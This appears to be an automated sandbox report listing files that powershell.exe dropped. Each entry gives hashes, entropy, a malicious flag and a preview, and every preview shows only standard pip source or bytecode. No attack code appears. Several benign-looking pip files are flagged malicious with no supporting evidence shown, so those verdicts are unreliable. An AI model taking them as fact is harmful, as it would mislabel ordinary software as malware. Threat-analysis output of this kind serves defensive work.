                                                                                                                                                                                                                              SSDEEP:48:/+9xh5cEAuWUj0liK4C4O2IAqM2AJitkt0uXU9tyrIV/QRG7c/1i1eTbnQAyS:/cxh5ctun0IZyzGJiqU9orgoRGwNi1ef
                                                                                                                                                                                                                              MD5:09657AB688E36AE6641F732999FF5E92
                                                                                                                                                                                                                              SHA1:8E0E2F7C9AE3D859A2F11D6DBBC5F7AEA26CC1E5
                                                                                                                                                                                                                              SHA-256:CD1559A1ACFEDAFB2B7B38FF1F784B3A131908AF5CED36F35A00BE8CE6A50F4D
                                                                                                                                                                                                                              SHA-512:A8BE098B587C9B3CDB530BA7D5468450AFF000843A94E5AEA689A71CCAA78E763C51EBD06CF49A9B3503CFAB3B278DC487577000EA5A6541991CB738CDAA8F96
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from typing import Any, Dict, Sequence..from pip._vendor.packaging.markers import default_environment..from pip import __version__.from pip._internal.req.req_install import InstallRequirement...class InstallationReport:. def __init__(self, install_requirements: Sequence[InstallRequirement]):. self._install_requirements = install_requirements.. @classmethod. def _install_req_to_dict(cls, ireq: InstallRequirement) -> Dict[str, Any]:. assert ireq.download_info, f"No download_info for {ireq}". res = {. # PEP 610 json for the download URL. download_info.archive_info.hashes may. # be absent when the requirement was installed from the wheel cache. # and the cache entry was populated by an older pip version that did not. # record origin.json.. "download_info": ireq.download_info.to_dict(),. # is_direct is true if the requirement was a direct URL reference (which. # includes editable requi
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20777
                                                                                                                                                                                                                              Entropy (8bit):4.5847812976968205
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:UTt7OjNT51GuxMgExJAvYDr3pJYQ+ebhH4Lb3GIppfT3QBHnarT3:A7UNT51rxkxmw/ZJx+YhH4Lb3G8tzQhg
                                                                                                                                                                                                                              MD5:EB81AAD0A35DD6B2DE4C27B643E404C7
                                                                                                                                                                                                                              SHA1:15A3B67CF3296F1DF342BACB84F02BF3FE532234
                                                                                                                                                                                                                              SHA-256:5E2ACE006BF58E032EEEFBBCEE4B8F6E88468FB547A7056B776AB729481540D8
                                                                                                                                                                                                                              SHA-512:EF236F8A11582F93B856F4F9888CBEDFFC30A995E1A04F567F31128CF985831EF996581B8190E7E65E5B3A273A77176CA3DA88EB6C1867A1EC0B7121039EC73D
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import functools.import itertools.import logging.import os.import posixpath.import re.import urllib.parse.from dataclasses import dataclass.from typing import (. TYPE_CHECKING,. Any,. Dict,. List,. Mapping,. NamedTuple,. Optional,. Tuple,. Union,.)..from pip._internal.utils.deprecation import deprecated.from pip._internal.utils.filetypes import WHEEL_EXTENSION.from pip._internal.utils.hashes import Hashes.from pip._internal.utils.misc import (. pairwise,. redact_auth_from_url,. split_auth_from_netloc,. splitext,.).from pip._internal.utils.models import KeyBasedCompareMixin.from pip._internal.utils.urls import path_to_url, url_to_path..if TYPE_CHECKING:. from pip._internal.index.collector import IndexContent..logger = logging.getLogger(__name__)...# Order matters, earlier hashes have a precedence over later hashes for what.# we will pick to use.._SUPPORTED_HASHES = ("sha512", "sha384", "sha256", "sha224", "sha1", "md5")...@dataclass(frozen=True)
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):738
                                                                                                                                                                                                                              Entropy (8bit):4.455127026433689
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:QCBhJAYp5FaREQr4GtXUSd7mry13LElvv1sydX/YwcjcFCbP:DhRLwHUEdCry130sOejcQ7
                                                                                                                                                                                                                              MD5:77B8766C2C20290FC2545CB9F68E64EB
                                                                                                                                                                                                                              SHA1:FC639818C98AB821887BD5AE95FD49DED2D8634A
                                                                                                                                                                                                                              SHA-256:DC4150A7F202BBFB211F5F9306A865D1002EB0A08F0C53A580715E3785E8C16B
                                                                                                                                                                                                                              SHA-512:BE0B3E58A796077E457526ABE8C9E1EE7D3D5707B588DB4E655BA454546DE0366189C34811954680E2CFE6172F04DD4BD6AF4FEE4599BADD63FF0126A5A344EF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:""".For types associated with installation schemes...For a general overview of available schemes and their context, see.https://docs.python.org/3/install/index.html#alternate-installation.."""...SCHEME_KEYS = ["platlib", "purelib", "headers", "scripts", "data"]...class Scheme:. """A Scheme holds paths which are used as the base directories for. artifacts associated with a Python package.. """.. __slots__ = SCHEME_KEYS.. def __init__(. self,. platlib: str,. purelib: str,. headers: str,. scripts: str,. data: str,. ) -> None:. self.platlib = platlib. self.purelib = purelib. self.headers = headers. self.scripts = scripts. self.data = data.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4643
                                                                                                                                                                                                                              Entropy (8bit):4.246322915605786
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:WxeLxlCN2huvcRLnU6rgU0Sgb6LhqqqlAeQEW4aL79B1sOp8DMUPD7iGKzK0MLwj:VxlCNRkRbJG6FSlArn4a/tIrL0Mi9
                                                                                                                                                                                                                              MD5:3BC5A1B39721B6B06248F40CBEBB40D9
                                                                                                                                                                                                                              SHA1:6EC69D7090B207E5B202989ACD581D0B86A0118D
                                                                                                                                                                                                                              SHA-256:012572C99C622482F0EDB4C8555A49C7C276F773371E4E45DF78A51A7D1EF347
                                                                                                                                                                                                                              SHA-512:8DF2CB44F070630447205681F141E457B3900C1AE4582C40B3A0ECDF666DCBC667E8EE9B1D6D60BC32AC4260BBEE697A04DDB0E689A056091AC218A5EAE355DC
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import itertools.import logging.import os.import posixpath.import urllib.parse.from typing import List..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.models.index import PyPI.from pip._internal.utils.compat import has_tls.from pip._internal.utils.misc import normalize_path, redact_auth_from_url..logger = logging.getLogger(__name__)...class SearchScope:.. """. Encapsulates the locations that pip is configured to search.. """.. __slots__ = ["find_links", "index_urls", "no_index"].. @classmethod. def create(. cls,. find_links: List[str],. index_urls: List[str],. no_index: bool,. ) -> "SearchScope":. """. Create a SearchScope object after normalizing the `find_links`.. """. # Build find_links. If an argument starts with ~, it may be. # a local file relative to a home directory. So try normalizing. # it and if it exists, use the normalized version.. # This is del
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1907
                                                                                                                                                                                                                              Entropy (8bit):4.375302448918886
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1REm/+RAsQ8GYLRvBo2qBVP2XMglzB7QMaqn7V4eMQKuIgrGIpshf/Pg7d7l05IW:SAG1iVglQONze/Y2
                                                                                                                                                                                                                              MD5:A9FA37FF60BA1523C11FD12AF309E711
                                                                                                                                                                                                                              SHA1:64627B9F7F60ADD87CFE2D2B107D262480AAB44E
                                                                                                                                                                                                                              SHA-256:299762EBA82C47EFD151752BF6E7A3B2C937AE64C7AD054959E340DAC57E5526
                                                                                                                                                                                                                              SHA-512:DA77858C1164B41B596907B9323573DE1B7870F75B434A407E3652E97B13668238EF4F1A99D77727E7DF7043F8A4C61F6965458768ADDB7AC0824C6CEAEEDBA8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from typing import Optional..from pip._internal.models.format_control import FormatControl...class SelectionPreferences:. """. Encapsulates the candidate selection preferences for downloading. and installing files.. """.. __slots__ = [. "allow_yanked",. "allow_all_prereleases",. "format_control",. "prefer_binary",. "ignore_requires_python",. ].. # Don't include an allow_yanked default value to make sure each call. # site considers whether yanked releases are allowed. This also causes. # that decision to be made explicit in the calling code, which helps. # people when reading the code.. def __init__(. self,. allow_yanked: bool,. allow_all_prereleases: bool = False,. format_control: Optional[FormatControl] = None,. prefer_binary: bool = False,. ignore_requires_python: Optional[bool] = None,. ) -> None:. """Create a SelectionPreferences object... :param allow_yank
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4272
                                                                                                                                                                                                                              Entropy (8bit):4.305122138474475
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:kc9EQKRRanYetfd3atqSKpclTqQPEfheKckjXiOf3N08lsqHpadDPcfAzLGXN8Ln:kc7Kj7e9tatQpclTqQPLK0uVOPoKQLWV
                                                                                                                                                                                                                              MD5:2DF3C0F383CD9A90B1C6EC3785F267EC
                                                                                                                                                                                                                              SHA1:479A26A092F77A856B804A38331A6B8D2440CFC6
                                                                                                                                                                                                                              SHA-256:DF8124A2BACCB91BD1A7E6E3A87289F9B38EEF59BDC5D8CDD9BF16585102D875
                                                                                                                                                                                                                              SHA-512:83A41BA6F48A235E75B8B97EFBF64DC777B24E92E1D011E6403C326891040AF544047CE1FBE41417DBDC6EBD5755D612B3D98CC68B1729A3FAB48A545E3937F7
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import sys.from typing import List, Optional, Set, Tuple..from pip._vendor.packaging.tags import Tag..from pip._internal.utils.compatibility_tags import get_supported, version_info_to_nodot.from pip._internal.utils.misc import normalize_version_info...class TargetPython:.. """. Encapsulates the properties of a Python interpreter one is targeting. for a package install, download, etc.. """.. __slots__ = [. "_given_py_version_info",. "abis",. "implementation",. "platforms",. "py_version",. "py_version_info",. "_valid_tags",. "_valid_tags_set",. ].. def __init__(. self,. platforms: Optional[List[str]] = None,. py_version_info: Optional[Tuple[int, ...]] = None,. abis: Optional[List[str]] = None,. implementation: Optional[str] = None,. ) -> None:. """. :param platforms: A list of strings or None. If None, searches for. packages that are supported by the
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3600
                                                                                                                                                                                                                              Entropy (8bit):4.5473966910251695
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:LwCUcYKBjGYBcAkEOYKiKV/8N1lE/GNLnxP1:VJBiBUE/Gr1
                                                                                                                                                                                                                              MD5:A6E4DE72BC628633E4AC9598B55EA9E7
                                                                                                                                                                                                                              SHA1:CF55FF5F5C3457AD21CFB24F341871B7378A4197
                                                                                                                                                                                                                              SHA-256:62A6B3A0867299AFD0D5E8C56B50BB3472904515A5BD691D2BDE9544A98305E2
                                                                                                                                                                                                                              SHA-512:8862E0663343C8B476C1EB5BEEBD7CE0FF05B3D43772F9B221CEF20EFDF8F148D0B77B4701454647C5BFF1C7034C4FE344B8B80F094845BAB5475BB3B6361C57
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Represents a wheel file and provides access to the various parts of the.name that have meaning..""".import re.from typing import Dict, Iterable, List..from pip._vendor.packaging.tags import Tag..from pip._internal.exceptions import InvalidWheelFilename...class Wheel:. """A wheel file""".. wheel_file_re = re.compile(. r"""^(?P<namever>(?P<name>[^\s-]+?)-(?P<ver>[^\s-]*?)). ((-(?P<build>\d[^-]*?))?-(?P<pyver>[^\s-]+?)-(?P<abi>[^\s-]+?)-(?P<plat>[^\s-]+?). \.whl|\.dist-info)$""",. re.VERBOSE,. ).. def __init__(self, filename: str) -> None:. """. :raises InvalidWheelFilename: when the filename is invalid for a wheel. """. wheel_info = self.wheel_file_re.match(filename). if not wheel_info:. raise InvalidWheelFilename(f"{filename} is not a valid wheel filename."). self.filename = filename. self.name = wheel_info.group("name").replace("_", "-"). # we'll assume "_" means "-" due to whe
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):50
                                                                                                                                                                                                                              Entropy (8bit):4.1288840705376355
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:5WFVQtGSKH4F0MzDv:YQtG5YiMfv
                                                                                                                                                                                                                              MD5:3893F116D94097C4AE72769A5F7C21F7
                                                                                                                                                                                                                              SHA1:CC7B633895C11040D0B99E7D0575B1D031652035
                                                                                                                                                                                                                              SHA-256:8DFE93B799D5FFBCE401106B2A88C85C8B607A3BE87A054954A51B8406B92287
                                                                                                                                                                                                                              SHA-512:924BC4A7222FC638FC8FAB4A6E7AEA876E25DCD355AFF628AA21A77BA0ECE90E774FA75D1797CFE688B7129626AAE395662489419AD53CAB4A842367FE97BCB8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:"""Contains purely network-related utilities..""".
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):236
                                                                                                                                                                                                                              Entropy (8bit):5.027945298627418
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:GaCCVmXQtG5YiMh/Z6B0Wltbw52KNdAreKAsShMR6IaYleHXlll:GaCCMXVYic6BvPLKNnblMRjaYkH1ll
                                                                                                                                                                                                                              MD5:E244867B3990ED8CA3F63705A720C336
                                                                                                                                                                                                                              SHA1:63B3E5E40EE64DCB4AEE1B1F00AAE0C5220902E9
                                                                                                                                                                                                                              SHA-256:E11CB5DF02DEA40B8250217D27D30CCB57DF7EC9E3492504495FBEB674D0E03B
                                                                                                                                                                                                                              SHA-512:08A0C05812FE9627B8C0704BD70B020D1E70A74A28C1E6CEE662C90498EDD56B081030E52DA64CEF179F8F7A8945E38EDAA88EE6FB0D5D2CEDD5D404FFC74C54
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf2...............................d.Z.y.).z+Contains purely network-related utilities..N)...__doc__........OC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/network/__init__.py..<module>r........s..............r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):21978
                                                                                                                                                                                                                              Entropy (8bit):5.363993118550355
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:72tN0q2zfeqFDTXfadOA3Z7eNkgy/nYH8ka76wkhsMh/ccO2:qtyq2P9Tm7eNkgyb5wsMh/cF2
                                                                                                                                                                                                                              MD5:D5E16F8059E896E582F59F866017D56C
                                                                                                                                                                                                                              SHA1:B0729FCC38E10457D5BDD476C1013579767754E5
                                                                                                                                                                                                                              SHA-256:8EE8864148D59CDF17CE8CD98361D5EDE178CAE00B2A1A65F7E40F0DF8D0B8CD
                                                                                                                                                                                                                              SHA-512:3D3BE51F5E23320AEB3F31211BC656F0C0E71CB42B97233DF3BAC6F52ECAC88EB18C6601FEA03BE3352401A2ED0727B0ECFC9EB2D80F031AA51505C84A97D92D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf=P.............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l m!Z!..d.d.l"m#Z#m$Z$m%Z%m&Z&m'Z'..d.d.l(m)Z)....e!e*........Z+d.a,..G.d...d.e.........Z-..G.d...d.e.........Z...G.d...d.e.........Z/..G.d...d.e.........Z0..G.d...d.e.........Z1..e.d...........d.e2d.e.f.d...........Z3..G.d...d.e.........Z4y.).z.Network Authentication Helpers..Contains interface (MultiDomainBasicAuth) and associated glue code for.providing credentials in the context of network requests.......N)...ABC..abstractmethod)...lru_cache)...commonprefix)...Path)...Any..Dict..List..NamedTuple..Optional..Tuple)...AuthBase..HTTPBasicAuth)...Request..Response)...get_netrc_auth)...getLogger)...ask..ask_input..ask_password..remove_auth_from_url..split_auth_netloc_from_url)...AuthInfoFc.....................,.....e.Z.d.Z.U.e.e.d.<...e.e.d.<...e.e.d.<...y
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6500
                                                                                                                                                                                                                              Entropy (8bit):5.3104885286001124
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:bQktNz0ENOtSKYrAdjB97K761ekKg7j03mgFPnB:0krz0ENOpLK7Me1g7I/PB
                                                                                                                                                                                                                              MD5:EF3113CBA55BF90AD0ABEEDCB5910B6F
                                                                                                                                                                                                                              SHA1:BFCAD7DF72A448522F5999DC21B8483D4B827F5C
                                                                                                                                                                                                                              SHA-256:A406E90F5BBD8E1C887866675876F3BEA5EE8050229E094B8500C62A14AC2F33
                                                                                                                                                                                                                              SHA-512:771F7D24D7B2EDEFC517AF712CC744C0F6C75A80A4451C7200D2D1D08384BE5D4A91920AAD793A8609DDC00A307C505909AE1A5D149E0FF2B18665263534D081
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf_...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.e.d.e.f.d...Z.e.d.e.d.....f.d...........Z...G.d...d.e.........Z.y.).z.HTTP cache implementation.......N)...contextmanager)...datetime)...BinaryIO..Generator..Optional..Union)...SeparateBodyBaseCache)...SeparateBodyFileCache)...Response)...adjacent_tmp_file..replace)...ensure_dir..response..returnc...........................t.........|.d.d.........S.).N..from_cacheF)...getattr).r....s.... .LC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/network/cache.py..is_from_cacher........s..........8.\.5..1..1.....).NNNc................#....4...K.......d.......y.#.t.........$.r...Y.y.w.x.Y.w...w.).zvIf we can't access the cache then we can just skip caching and process. requests as if caching wasn't enabled.. N)...OSError..r....r......suppressed_cache_errorsr........s...................................s..........
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8535
                                                                                                                                                                                                                              Entropy (8bit):5.36783305277322
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:blJj93fTWKcFJ3YHTZteuu2QZMXlW/UTGvIyjztv3:Zz3CKcFdYHuuCIWMqvZlv3
                                                                                                                                                                                                                              MD5:7E857BDE48083857B69600C9E73685D0
                                                                                                                                                                                                                              SHA1:DE3F4CB6C8C43166A0D6DA0A98D23B033DA27DF6
                                                                                                                                                                                                                              SHA-256:ED26DEF86C2AA0989820587F33BE7FE84D60FAA6B73987F17DED7086A825554E
                                                                                                                                                                                                                              SHA-512:113EC9B56EDD2B7D73A6570124EFC1FDAD2FEE7CF1DF2B5070B6491B78EABB427A63F0BC807F4AC82EC569769731DC25807A84C02DD6D4DD00ACA0BE293A49A0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m Z ....e.jB..................e"........Z#d.e.d.e.e$....f.d...Z%d.e.d.e.d.e&d.e.e'....f.d...Z(d.e&d.e&f.d...Z)d.e&d.e&d.e&f.d...Z*d.e.d.e.d.e&f.d...Z+d.e.d.e.d.e.f.d...Z,..G.d...d.........Z-..G.d...d.........Z.y.).z)Download files with progress indicators.......N)...Iterable..Optional..Tuple)...CONTENT_CHUNK_SIZE..Response)...get_download_progress_renderer)...NetworkConnectionError)...PyPI)...Link)...is_from_cache)...PipSession)...HEADERS..raise_for_status..response_chunks)...format_size..redact_auth_from_url..splitext..resp..returnc.....................h.......t.........|.j...................d.............S.#.t.........t.........t.........f.$.r...Y.y.w.x.Y.w.).Nz.content-length)...int..headers..ValueError..KeyError..TypeError).r....s.... .OC:\Users\xbov\Desktop\pyops
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11645
                                                                                                                                                                                                                              Entropy (8bit):5.402978794253213
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:MFSCKFuQcQoJ6E0zpnyIDLLh3fbpwAHWQfpOSsOB5qMTn:MFn9Qbo3epyMLLhTpwS0SJB5qun
                                                                                                                                                                                                                              MD5:9982B32E9B2F3A1DEAF4799B6629AD35
                                                                                                                                                                                                                              SHA1:67BA33AA185960A11AB1B68F37928A3E0363CEB1
                                                                                                                                                                                                                              SHA-256:94463F46A971DA3B3D0D896BD484B3A79A07368F52D030A4E9F1EBCFEEA68454
                                                                                                                                                                                                                              SHA-512:CF6D8523D2C7A9908737206AE0850CCAB7DDBE98F7AA654F017B35F9259C77BB9E3DEC7DA91E32177555F599DE4BABF0F5F173D41C6457BD10214B7F7452C933
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf................................d.Z.d.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m Z m!Z!....G.d...d.e"........Z#d.e$d.e$d.e.d.e.f.d...Z%..G.d...d.........Z&y.).z.Lazy ZIP over HTTP..HTTPRangeRequestUnsupported..dist_from_wheel_url.....)...bisect_left..bisect_right)...contextmanager)...NamedTemporaryFile)...Any..Dict..Generator..List..Optional..Tuple)...BadZipFile..ZipFile)...canonicalize_name)...CONTENT_CHUNK_SIZE..Response)...BaseDistribution..MemoryWheel..get_wheel_distribution)...PipSession)...HEADERS..raise_for_status..response_chunksc...........................e.Z.d.Z.y.).r....N)...__name__..__module__..__qualname__........QC:\Users\xbov\Desktop\pyops\Lib\site-packages\pip/_internal/network/lazy_wheel.pyr....r........s.........r .....name..url..session..returnc..........................t.........|.|.........5.}.t.........|.j...................|....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):18756
                                                                                                                                                                                                                              Entropy (8bit):5.506125893758524
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:0A5OcATqK1yo9Uhmo3ZcmrVDW34lNfouw7CIFv+hF6zrN:0A5OLUcgnfO+hFMrN
                                                                                                                                                                                                                              MD5:1F5C87AE1D2F421BCD16D6482A8C0B74
                                                                                                                                                                                                                              SHA1:6F095887D1DDA788B91381667476215DFAD47CD5
                                                                                                                                                                                                                              SHA-256:83BBE50BA11F0A84F1F27AB957C8824B0B7A964205FD9A2D51BE9449D1E67EDC
                                                                                                                                                                                                                              SHA-512:DC25D2157D49FB8BCF73B1E79FE1F5F31FB20876DB84FB521D3361BE15FD7C3C687C586A6D11723C046A97CEEA23A3505FD4FFC0818AF2AB71AD4E11C3888187
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf.I..............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z ..d.d.l!m"Z"m#Z#..d.d.l!m$Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>m?Z?..d.d.l@mAZA..e.r.d.d.lBmCZC..d.d.lDmEZE....e.j...................eG........ZHe.eIeIe.e.eJeIf.........f.....ZK..e.j...................d.e.............g.d...ZMe.eK....eNd.<...d.ZOd.ePf.d...ZQd.eIf.d...ZR..G.d...d e#........ZS..G.d!..d"........ZT..G.d#..d$eTe%........Z$..G.d%..d&eTe ........Z...G.d'..d(e$........ZU..G.d)..d*e.........ZV..G.d+..d,e.j...........................ZXy.)-zhPipSession and supporting code, containing all pip-specific.network request configuration and behavior.......N)...TYPE_CHECKING..Any..Dict..Generator..List..Mapping..Optional..Sequence..Tuple..Union)...reques
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2235
                                                                                                                                                                                                                              Entropy (8bit):5.546068039298317
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:pD68uaLawawkR5fTDUFH9DOv1U4a4IfbMkQT7g4qJYQ0n:NMwbkBQFHda64gdQg4qYQ0n
                                                                                                                                                                                                                              MD5:EC07B1DE0F797FCE0C68ADCBC06734EC
                                                                                                                                                                                                                              SHA1:B84BBA96ADFB74790C5600BDF2E93A136517068E
                                                                                                                                                                                                                              SHA-256:7F2EFF1A3333A95F01799A327CD202CFC6B831105973EB7B0FE5DEA82C427F42
                                                                                                                                                                                                                              SHA-512:365EDA60DAC4B03CCD3602D2843614C931247F57A73770DD177139E8E1CF40D030A183F84A7F4923B5767CFB622F6D0752379341661DCF4A3CCF0EF1E83E57D0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........|.Vf...............................U.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.i.Z.e.e.e.f.....e.d.<...d.e.d.d.f.d...Z.e.f.d.e.d.e.d.e.e.d.d.f.....f.d...Z.y.)......)...Dict..Generator)...CONTENT_CHUNK_SIZE..Response)...NetworkConnectionErrorz.Accept-Encoding..identity..HEADERS..resp..returnNc...........................d.}.t.........|.j...................t.................r...|.j...................j...................d.........}.n.|.j...................}.d.|.j...................c.x.k...r.d.k...r"n...n.|.j.....................d.|...d.|.j.......................}.n6d.|.j...................c.x.k...r.d.k...r!n...n.|.j.....................d.|...d.|.j.......................}.|.r.t.........|.|.............y.#.t.........$.r...|.j...................j...................d.........}.Y...w.x.Y.w.).N..z.utf-8z.iso-8859-1i....i....z. Client Error: z. for url: iX...z. Server Error: )...response)...isinstance..reason..bytes..decode..UnicodeDecodeError..status_code..urlr....).r......http_er
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2931
                                                                                                                                                                                                                              Entropy (8bit):5.438280438276069
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:GSB++JWLcdP++/1eqoZ4HPBX30SljugoDRcJ5zX60687i6llPLmR:e+JWLcc+dsAdjp3zX6z0L2
                                                                                                                                                                                                                              MD5:D5B32FE482EDCBE12F85F62F514CB4E6
                                                                                                                                                                                                                              SHA1:CC4C45409DFD45654B7E016C1C33670F97E87C57
                                                                                                                                                                                                                              SHA-256:D5AE5F0D34B684B83A0674B200733E774F3D0796443C2A91B4EABE8558DFF320
                                                                                                                                                                                                                              SHA-512:E4D75CA45E70828124BFCDCAA966CC4AD9C07E0EC7390DE5E158BF76A4F5C6BBB99EBDFE4335C801DD44FD91466F190FAB904EECE04680F5C550D02F7FD7E564
                                                                                                                                                                                                                              Malicious:false
